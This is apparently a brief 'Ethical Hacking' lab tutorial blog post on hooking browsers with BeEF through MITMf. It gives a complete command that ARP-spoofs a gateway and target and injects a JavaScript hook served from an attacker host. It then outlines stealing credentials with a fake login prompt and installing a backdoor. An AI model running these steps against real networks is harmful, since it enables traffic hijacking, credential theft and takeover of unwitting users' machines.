zoukankan      html  css  js  c++  java
  • Ethical Hacking

    CLIENT SIDE ATTACK - BeEF Framework

    Hooking targets using MITMF

    Tools: MITMF and BeEF

    Start BeEF and execute the following commands:

    python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --inject --js-url http://10.0.0.13:3000/hooks

    Open any website in the browser on the target machine. You can find injected codes on the source page.

     Open BeEF control panels and find the victim online browsers.

     Then you can execute the commands to exploit victimized machines.

    1. Get screenshots through Spyder Eys.

     2. Get account name and password through Pretty Theft.

     If a victim fills in the prompted login form, you can get username and password.

     

     3. Gaining full control over Windows Target

    Download and install the backdoor file on the target machine, then you can control this computer.

     

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    JEECG开发总结
    ehcache集群的配置
    spring拦截器
    spring的基本配置
    kindeditor编辑器
    jQuery中的Ajax
    表单验证
    Python中的Random模块
    Open vSwitch FAQ (二)
    Open vSwitch FAQ (一)
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/12268289.html
Copyright © 2011-2022 走看看